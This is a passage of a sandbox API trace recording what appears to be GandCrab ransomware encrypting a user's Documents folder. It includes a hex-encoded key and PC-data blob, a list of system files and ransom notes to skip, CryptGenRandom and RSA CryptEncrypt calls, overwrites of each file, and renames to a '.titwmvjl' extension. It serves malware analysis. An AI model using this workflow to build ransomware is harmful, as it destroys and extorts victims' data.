x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0090.068] WriteFile (in: hFile=0x2c4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259eab8, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259eab8*=0x2162, lpOverlapped=0x0) returned 1 [0090.069] CloseHandle (hObject=0x2c4) returned 1 [0090.069] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.069] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.069] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x23, wMilliseconds=0x17c)) [0090.069] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.069] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0090.069] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0090.070] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\d2ca4a09d2ca4deb61a.lock") returned 111 [0090.070] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2c4 [0090.070] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.070] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.071] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\") returned 87 [0090.071] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\*" [0090.071] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\*", fInfoLevelId=0x1, lpFindFileData=0x259ead4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ead4) returned 0x503638 [0090.071] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.071] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0090.072] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.072] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.072] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0090.072] lstrcmpW (lpString1="0PJbRt.ppt", lpString2=".") returned 1 [0090.072] lstrcmpW (lpString1="0PJbRt.ppt", lpString2="..") returned 1 [0090.072] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\", lpString2="0PJbRt.ppt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\0PJbRt.ppt") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\0PJbRt.ppt" [0090.072] lstrlenW (lpString=".titwmvjl") returned 9 [0090.072] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\0PJbRt.ppt") returned 97 [0090.072] VirtualAlloc (lpAddress=0x0, dwSize=0x102, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.072] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\0PJbRt.ppt.titwmvjl") returned 106 [0090.072] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\0PJbRt.ppt") returned 97 [0090.072] lstrlenW (lpString=".ppt") returned 4 [0090.072] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.072] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".ppt ") returned 5 [0090.073] lstrcmpiW (lpString1=".ppt", lpString2=".titwmvjl") returned -1 [0090.073] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.073] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\0PJbRt.ppt") returned 97 [0090.073] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\0PJbRt.ppt") returned 97 [0090.073] lstrcmpiW (lpString1="0PJbRt.ppt", lpString2="desktop.ini") returned -1 [0090.073] lstrcmpiW (lpString1="0PJbRt.ppt", lpString2="autorun.inf") returned -1 [0090.073] lstrcmpiW (lpString1="0PJbRt.ppt", lpString2="ntuser.dat") returned -1 [0090.073] lstrcmpiW (lpString1="0PJbRt.ppt", lpString2="iconcache.db") returned -1 [0090.073] lstrcmpiW (lpString1="0PJbRt.ppt", lpString2="bootsect.bak") returned -1 [0090.073] lstrcmpiW (lpString1="0PJbRt.ppt", lpString2="boot.ini") returned -1 [0090.073] lstrcmpiW (lpString1="0PJbRt.ppt", lpString2="ntuser.dat.log") returned -1 [0090.073] lstrcmpiW (lpString1="0PJbRt.ppt", lpString2="thumbs.db") returned -1 [0090.073] lstrcmpiW (lpString1="0PJbRt.ppt", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0090.073] lstrcmpiW (lpString1="0PJbRt.ppt", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0090.073] lstrcmpiW (lpString1="0PJbRt.ppt", lpString2="KRAB-DECRYPT.html") returned -1 [0090.073] lstrcmpiW (lpString1="0PJbRt.ppt", lpString2="CRAB-DECRYPT.html") returned -1 [0090.073] lstrcmpiW (lpString1="0PJbRt.ppt", lpString2="KRAB-DECRYPT.txt") returned -1 [0090.073] lstrcmpiW (lpString1="0PJbRt.ppt", lpString2="CRAB-DECRYPT.txt") returned -1 [0090.073] lstrcmpiW (lpString1="0PJbRt.ppt", lpString2="ntldr") returned -1 [0090.073] lstrcmpiW (lpString1="0PJbRt.ppt", lpString2="NTDETECT.COM") returned -1 [0090.073] lstrcmpiW (lpString1="0PJbRt.ppt", lpString2="Bootfont.bin") returned -1 [0090.073] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\0PJbRt.ppt") returned 97 [0090.073] lstrlenW (lpString=".ppt") returned 4 [0090.073] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.074] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".ppt ") returned 5 [0090.074] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.074] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.074] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\0PJbRt.ppt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\0pjbrt.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2cc [0090.078] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.078] ReadFile (in: hFile=0x2cc, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ea20*=0x21c, lpOverlapped=0x0) returned 1 [0090.079] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.079] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.079] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4c9980) returned 1 [0090.080] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.080] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.080] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.080] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e9dc | out: pbBuffer=0x259e9dc) returned 1 [0090.081] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.081] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.081] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.081] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.081] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4c9980) returned 1 [0090.082] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.082] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.082] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.082] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e9fc | out: pbBuffer=0x259e9fc) returned 1 [0090.082] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.083] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.083] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.083] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.083] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4c9980) returned 1 [0090.084] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.084] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x5038f8) returned 1 [0090.084] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.084] CryptGetKeyParam (in: hKey=0x5038f8, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0090.084] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.084] CryptEncrypt (in: hKey=0x5038f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e974*=0x100) returned 1 [0090.085] GetLastError () returned 0x0 [0090.085] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.085] CryptDestroyKey (hKey=0x5038f8) returned 1 [0090.085] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.085] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.085] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.085] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4c9980) returned 1 [0090.086] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.086] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x503978) returned 1 [0090.086] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.087] CryptGetKeyParam (in: hKey=0x503978, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0090.087] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.087] CryptEncrypt (in: hKey=0x503978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e974*=0x100) returned 1 [0090.087] GetLastError () returned 0x0 [0090.087] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.087] CryptDestroyKey (hKey=0x503978) returned 1 [0090.087] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.087] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.087] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0090.087] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0090.088] ReadFile (in: hFile=0x2cc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ea20*=0x7b0b, lpOverlapped=0x0) returned 1 [0090.094] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xffff84f5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.094] WriteFile (in: hFile=0x2cc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x7b0b, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ea04*=0x7b0b, lpOverlapped=0x0) returned 1 [0090.095] WriteFile (in: hFile=0x2cc, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ea04*=0x21c, lpOverlapped=0x0) returned 1 [0090.096] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.100] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.100] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.100] CloseHandle (hObject=0x2cc) returned 1 [0090.101] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\0PJbRt.ppt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\0pjbrt.ppt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\0PJbRt.ppt.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\0pjbrt.ppt.titwmvjl"), dwFlags=0x1) returned 1 [0090.102] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.102] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0090.102] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0090.102] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0090.102] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\d2ca4a09d2ca4deb61a.lock" [0090.102] lstrlenW (lpString=".titwmvjl") returned 9 [0090.102] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\d2ca4a09d2ca4deb61a.lock") returned 111 [0090.102] VirtualAlloc (lpAddress=0x0, dwSize=0x11e, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.102] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 120 [0090.102] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\d2ca4a09d2ca4deb61a.lock") returned 111 [0090.102] lstrlenW (lpString=".lock") returned 5 [0090.102] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.102] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0090.103] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.103] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.103] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0090.103] lstrcmpW (lpString1="eUDfQARDF6x.odt", lpString2=".") returned 1 [0090.103] lstrcmpW (lpString1="eUDfQARDF6x.odt", lpString2="..") returned 1 [0090.103] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\", lpString2="eUDfQARDF6x.odt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\eUDfQARDF6x.odt") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\eUDfQARDF6x.odt" [0090.103] lstrlenW (lpString=".titwmvjl") returned 9 [0090.103] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\eUDfQARDF6x.odt") returned 102 